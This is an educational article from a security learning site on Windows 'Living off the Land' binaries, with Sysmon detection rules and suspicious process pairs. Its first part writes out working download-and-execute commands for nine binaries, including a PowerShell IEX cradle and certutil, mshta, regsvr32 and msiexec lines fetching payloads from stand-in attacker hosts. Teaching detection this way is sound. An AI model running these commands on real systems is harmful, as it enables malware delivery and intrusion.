EpochZero Learn
EpochZero LearnMulti-Domain Tech Learning Hub
Courses
LeaderboardAbout
Dashboard
EpochZero
EpochZero Learn
Multi-Domain Tech Learning Hub

Structured learning for Reverse Engineering, Cloud Security, Cryptography, and Web Development. Articles, videos, tests, and peer discussion.

Learn

  • Learning Path
  • All Articles
  • Video Lessons
  • Podcast
  • eBooks & PDFs
  • Question Banks
  • Cheatsheets
  • MCQ Banks

Tests & Forum

  • All Tests
  • REMA Tests
  • Cloud Tests
  • Forum
  • REMA Forum
  • Cloud Forum
  • Crypto Forum
  • Web Dev Forum

Campus

  • REMA Club
  • Full Stack Dev Club
  • Extension Activity
  • Events
  • CTF Competitions
  • Workshops
  • Industrial Visits

Platform

  • Dashboard
  • Leaderboard
  • About
  • Verify Certificate

© 2026 EpochZero Learn. Educational content for learning purposes.

Course Instructor: Ashish Revar

All articles
Educationlolbinsliving-off-the-landpowershell

Living off the Land (LotL)

How attackers abuse legitimate signed Windows binaries to download payloads, execute code, and bypass security controls — with command examples for nine LOLBins and detection strategies using Sysmon.

Ashish Revar12 May 202616 min read2 views

Sign in to mark this article as read and track your progress.

Related to this topic

Continue learning

Listen

The Malicious Process Lifecycle: From Execution to Evasion

How malware executes, establishes persistence, injects into legitimate processes, and evades detection inside modern operating systems.

Reference material

eBook
REMA eBook 2026
v1.0
Open resource
Cheatsheet
REMA Cheatsheet 2026
v1.0
Open resource
MCQ Bank
REMA MCQ Bank 2026
v1.0
Open resource
Question Bank
REMA Question Bank 2026
v1.0
Open resource

External references

LOLBAS Project — Living Off The Land Binaries

Definitive searchable catalogue of all known LOLBins with abuse scenarios, detection guidance, and real-world usage references.

reference
Sysmon — System Monitor by Sysinternals

Install Sysmon in your analysis VM with the SwiftOnSecurity config for immediate LOLBin detection coverage.

tool
MITRE ATT&CK — System Binary Proxy Execution (T1218)

ATT&CK parent technique for LOLBin abuse with all sub-techniques covering regsvr32, rundll32, mshta, msiexec, and others.

reference
More articlesTest your knowledge

What is Living off the Land?

Instead of dropping custom executables that antivirus can scan, attackers use legitimate Windows binaries already present on every machine. Security tools struggle to block these binaries because doing so would break legitimate administrative functions.

Definition: Living-off-the-Land Binaries (LOLBins) are legitimate, signed Windows executables that can be abused to download files, execute code, or bypass security controls. Because they are trusted system components, their malicious use often evades application whitelisting and endpoint detection.

The LOLBAS Project (lolbas-project.github.io) maintains the authoritative catalogue of all known LOLBins with abuse scenarios and detection guidance.

The Nine Most Abused LOLBins

1. powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden ^
  -Command "IEX(New-Object Net.WebClient).DownloadString('http://c2/stager.ps1')"

Downloads and executes a script entirely in memory. No file touches disk.

  • -NoProfile — skips profile script (faster, avoids logging side effects)
  • -ExecutionPolicy Bypass — ignores signing requirements
  • -WindowStyle Hidden — no visible console window
  • IEX (Invoke-Expression) — executes the downloaded string as code

2. certutil.exe

certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\Users\Public\svc.exe
certutil.exe -decode encoded.txt payload.exe

Originally a certificate management tool. Abused to download arbitrary files (-urlcache) and decode Base64 payloads (-decode).

3. mshta.exe

mshta.exe http://evil.com/payload.hta
mshta.exe javascript:"\..\mshtml,RunHTMLApplication";alert('pwned')

Executes HTML Applications (HTA) with full OS access. Bypasses PowerShell execution policy entirely because it uses a different scripting engine.

4. msiexec.exe

msiexec /q /i http://evil.com/payload.msi

Downloads and executes a malicious .msi package silently (/q = quiet mode).

5. regsvr32.exe

regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll

Executes a remote scriptlet (.sct) containing VBScript or JScript. Bypasses AppLocker because regsvr32.exe is typically whitelisted. Known as the "Squiblydoo" technique.

6. rundll32.exe

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";...
rundll32.exe url.dll,OpenURL http://evil.com/payload

Beyond loading DLLs, rundll32.exe can execute JavaScript via the mshtml COM object and open URLs via url.dll.

7. wmic.exe

wmic /node:192.168.1.50 /user:admin /password:P@ss process call create "cmd /c ..."

Executes commands on remote machines using WMI. No file is dropped on the remote machine. Common for lateral movement after credential theft.

8. bitsadmin.exe

bitsadmin /transfer job /download /priority high http://evil/p.exe C:\p.exe

Background Intelligent Transfer Service — designed for Windows Update downloads. Abused for silent background file downloads that survive reboots.

9. wscript.exe / cscript.exe

wscript.exe //E:vbscript payload.vbs
cscript.exe //E:jscript payload.js

Execute VBScript and JScript files. Initial access brokers distribute phishing attachments that invoke these engines. The //E flag forces a specific script engine regardless of file extension.

LOLBin Abuse Categories

CategoryLOLBinsWhat They Enable
File downloadcertutil, bitsadmin, msiexec, powershellStage 2 payload retrieval without a custom downloader
Code executionmshta, regsvr32, rundll32, wscriptRun scripts and code bypassing execution policy
Lateral movementwmic, powershellExecute commands on remote systems using stolen credentials
Encoding/decodingcertutil -decodeDecode Base64 payloads already on disk

Detection with Sysmon

Sysmon (System Monitor) logs process creation events with full command-line arguments. Event ID 1 captures every process launch.

Key Sysmon detection rules

<!-- Alert: certutil downloading a file -->
<Rule name="certutil_download" groupRelation="and">
  <Image condition="end with">certutil.exe</Image>
  <CommandLine condition="contains any">-urlcache;-split</CommandLine>
</Rule>

<!-- Alert: PowerShell encoded command -->
<Rule name="ps_encoded" groupRelation="and">
  <Image condition="end with">powershell.exe</Image>
  <CommandLine condition="contains any">-enc;-EncodedCommand</CommandLine>
</Rule>

<!-- Alert: regsvr32 loading remote scriptlet -->
<Rule name="squiblydoo" groupRelation="and">
  <Image condition="end with">regsvr32.exe</Image>
  <CommandLine condition="contains">scrobj.dll</CommandLine>
</Rule>

Suspicious parent-child process relationships

These parent-child pairs should almost never occur legitimately:

ParentChildImplication
winword.exepowershell.exeOffice macro launching PowerShell
outlook.execmd.exeEmail attachment executing shell
excel.exemshta.exeXLM macro or DDE launching HTA
winword.exewscript.exeMacro executing VBScript
explorer.exeregsvr32.exe /i:httpUser tricked into double-clicking

Any of these in Sysmon Event ID 1 is a high-confidence detection.

LOLBAS Project Reference

The LOLBAS Project at lolbas-project.github.io documents every known LOLBin, LOLLib, and LOLScript with:

  • The binary's legitimate purpose
  • All documented abuse methods
  • Detection strategies
  • References to real-world usage in threat actor campaigns

Bookmark it. It is the definitive reference for LOLBin research.